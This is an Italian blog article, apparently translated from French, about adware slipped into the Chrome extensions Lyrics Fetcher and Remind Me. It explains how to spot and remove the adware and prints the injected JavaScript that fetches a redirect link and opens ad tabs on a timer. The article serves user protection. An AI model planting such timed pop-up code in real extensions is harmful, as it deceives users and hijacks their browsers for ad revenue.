Il tuo browser Chrome potrebbe essere infetto dall'adware Boredtravel.com

Un adware che apre pop-up sul sito Boredtravel.com si è insinuato in alcune estensioni di Chrome. Ecco come individuare e rimuovere questo virus.

Identificare e rimuovere l'adware Boredtravel.com

Uno script dannoso è stato inserito nell'ultimo aggiornamento di diverse estensioni di Chrome. Questo script apre il sito Boredtravel.com all'insaputa degli utenti, a intervalli regolari di tempo. Le estensioni infettate da questo script sono Lyrics Fetcher e Remind Me, dell'utile sviluppatore web.

Questo adware non è pericoloso in quanto apre solo una pagina pubblicitaria. È comunque inquietante lasciare che si verifichi questa pratica dubbia.

Identifica l'adware

Per identificare l'adware, basta analizzare il comportamento del tuo browser:

  • Chiudi Google Chrome e riavvialo.
  • Attendere 6 minuti dopo l'apertura del browser. Se il tuo browser è infetto, si aprirà una scheda sulla pagina boredtravel.com dopo esattamente 6 minuti. Questo accadrà anche ogni 4 ore

Elimina adware

La rimozione è semplice e veloce:

  • Controlla le estensioni di Chrome: se sono installate una o più delle estensioni sopra elencate, probabilmente il tuo browser è infetto.
  • Per rimuovere questo adware, è sufficiente disabilitare o rimuovere le estensioni in questione.

I casi sono stati identificati per le estensioni Lyrics Fetcher e Ricordamelo, ma potrebbero non essere i soli. È possibile che l'adware sia presente anche sull'estensione Modalità bambino, un'estensione dello stesso sviluppatore.

Non è chiaro se lo sviluppatore di questa estensione abbia aggiunto deliberatamente lo script dannoso o se sia stato fatto da un hacker. Per precauzione, ti consigliamo di disabilitare o rimuovere tutte le estensioni da questo sviluppatore.

Le estensioni sono state segnalate a Google, lo sapremo presto. Se altre estensioni hanno lo stesso problema, non esitare a farcelo sapere.

Sostituisci estensioni

Ecco alcune estensioni alternative:

Il lavoro di Boredtravel.com

Il principio è semplice, lo sviluppatore o un hacker ha aggiunto uno script nelle estensioni interessate. Questo script, che viene eseguito in background, indica al browser di aprire una pagina pubblicitaria a intervalli regolari. L'obiettivo per lo sviluppatore o l'hacker è che la pagina di destinazione viene aperta più volte. Ciò consente di aumentare il numero di visualizzazioni del sito Boredtravel.com e di aumentare le entrate correlate.

Ecco il codice che è stato aggiunto nell'estensione. Ho aggiunto commenti verdi per capire meglio

<script>


// fonction qui ouvre un pop-up 6 minutes après le démarrage de Chrome
  setTimeout(function () { 
    $.ajax({
      url: "https://demo7530752.mockable.io/url",
           /* cette URL génère un lien du type
                https://ourshort.com/?g/BNHzHJJ */
      async: false,
      dataType: 'json',
      success: function (data) {

   //ouverture du lien généré, qui redirige ensuite vers Boredtravel.com
        var newURL = data.msg;
        chrome.tabs.create({ url: newURL }); ;
        intervalWebsite() /* appel de la fonction qui ouvre
                           un pop-up toutes les 4 heures */
      }
    });
  }, 6 * 60 * 1000) // 6 x 60 x 1000 millisecondes = 6 min


// fonction qui ouvre un pop-up toutes les 4 heures
  function intervalWebsite() {
    setInterval(function () {
      $.ajax({
        url: "https://demo7530752.mockable.io/url",
             // comme dans la première fonction
        async: false,
        dataType: 'json',
        success: function (data) {

          // comme dans la première fonction
          var newURL = data.msg;
          chrome.tabs.create({ url: newURL }); ;

        }
      });
    }, 240 * 60 * 1000)// 240 x 60 x 1000 millisecondes = 240 min = 4h
  }


</script>

fonti: https://www.reddit.com/r/techsupport/comments/dkt1si/boredtravelcom_virus_none_of_my_scanners_are/

Leggi anche: Abilita doppia autenticazione sui tuoi account online (2FA) https://currenttrends.fr/internet/2fa-double-authentification/

Circa l'autore

Romain
Romain
Sono molto interessato alla tecnologia, alla musica, alle questioni ambientali e a vari altri argomenti. Sviluppando i media Current Trends, il mio obiettivo è condividere con voi le mie conoscenze, le mie scoperte e i miei consigli sui vari argomenti che mi affascinano. Lasciami commenti, mi aiutano a migliorare e sono sempre apprezzati.

20 € offerti sui tuoi prodotti biologici francesi

Ottieni uno sconto di 20 € sui tuoi prodotti biologici francesi

Ti è piaciuto questo contenuto?

Aiutaci a migliorare la qualità dei nostri articoli raccontandoci i tuoi suggerimenti

Si prega di scorrere verso il basso per i commenti

20 € offerti sui tuoi prodotti biologici francesi

Ottieni uno sconto di 20 € sui tuoi prodotti biologici francesi

Aiutaci

Supporto
notiziario

commenti

S'abonner
Notifica di versamento
ospite

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.

2 Commentaires
Le più popolari
Le più recenti Le più antiche
Commentari in linea
Afficher tous les commentaires
Fernando Peña
Fernando Peña
3 anni fa

Ho questo problema ma non vedo nessuna delle estensioni che hai menzionato.

Aggiungi le tendenze attuali nelle tue applicazioni

Crea un collegamento
×
Attiva le notifiche ok Non merci